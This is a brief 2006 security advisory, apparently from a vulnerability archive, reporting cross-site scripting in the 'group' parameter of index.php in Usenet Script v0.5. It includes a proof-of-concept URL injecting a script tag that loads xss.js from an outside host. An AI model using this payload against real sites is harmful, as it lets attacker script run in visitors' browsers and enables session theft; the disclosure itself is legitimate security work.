UsenetScriptv0.5.txt

UsenetScriptv0.5.txt: Posted Jun 29, 2006; Authored by Luny; Usenet Script v0.5 suffers from cross site scripting in index.php; tags | advisory, php, xss; SHA-256 | 1ccc621b4089584ddd76df052fc4861b60845bbcc2632642bd2c35ce5cb5d1ff; Download | Favorite | View

UsenetScriptv0.5.txt

Usenet Script v0.5

Homepage:
http://www.metalhead.ws/usenet

Description:

"Those scripts allow you to mirror a Newsgroup in an SQL database. The development database was Postgresql, but it uses dbx and should therefore be able to work with other database systems, too. Furthermore, a frontend is provided."

Affected files:

index.php

------------------------------------
XSS vuln via index.php on group var:

Data isnt properly sanatized before being generated. 
http://www.example.com/index.php?group=<script src=http://www.youfucktard.com/xss.js></script>

Top Authors In Last 30 Days

Red Hat 216 files
Ubuntu 78 files
indoushka 77 files
Jasper Nota 25 files
Gentoo 22 files
Willem Westerhof 19 files
Debian 18 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,096)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,553)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,689)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,482)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,736)
UNIX (9,435)
UnixWare (187)
Windows (6,671)
Other

UsenetScriptv0.5.txt

UsenetScriptv0.5.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

UsenetScriptv0.5.txt

Share This

UsenetScriptv0.5.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems